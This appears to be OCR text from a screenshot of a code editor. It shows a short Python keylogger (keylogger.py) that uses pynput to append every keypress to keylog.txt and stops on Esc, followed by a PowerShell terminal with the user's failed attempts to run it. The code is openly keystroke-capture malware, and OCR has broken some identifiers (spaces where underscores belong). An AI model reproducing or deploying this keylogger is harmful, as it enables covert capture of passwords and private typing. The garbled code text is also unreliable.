```
keylogger.py X
         from pynput import keyboard
         def on press(key):
             try:
                 # Log the character of the key pressed
                with open("keylog.txt", "a") as log file:
                     log file.write(key.char)
             except AttributeError:
                 with open("keylog.txt", "a") as log_file:
                     log file.write(f'[{key}]')
         def on release(key):
             if key == keyboard.Key.esc:
                 return False
         # Set up the listener for key press and release events
         with keyboard.Listener(on press=on press, on release=on release) as listener:
             listener.join()
                                    TERMINAL
  PROBLEMS
            OUTPUT DEBUG CONSOLE
                                                      COMMENTS
  Suggestion [3,General]: The command keylogger.py was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default.
  If you trust this command, instead type: ".\keylogger.py". See "get-help about Command Precedence" for more details.
  PS C:\Users\alokr\Downloads> cd keylogger.py
  cd : Cannot find path 'keylogger.py' because it does not exist.
  + cd keylogger.py
                             : ObjectNotFound: (keylogger.py:String) [Set-Location], ItemNotFoundException
      + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
  PS C:\Users\alokr\Downloads> ./keylogger.py
⊗ 0 <u>∧</u> 0 ⊗
                                                                                                                              Ln 9, Col 59 Spaces: 4 UTF-8 CRLF ( Python 3.12.2 64-bit tabnir
```

■ @echo off.bit | activator.bat | crypt.bit | Alok Rathor - Ri Alok Ratho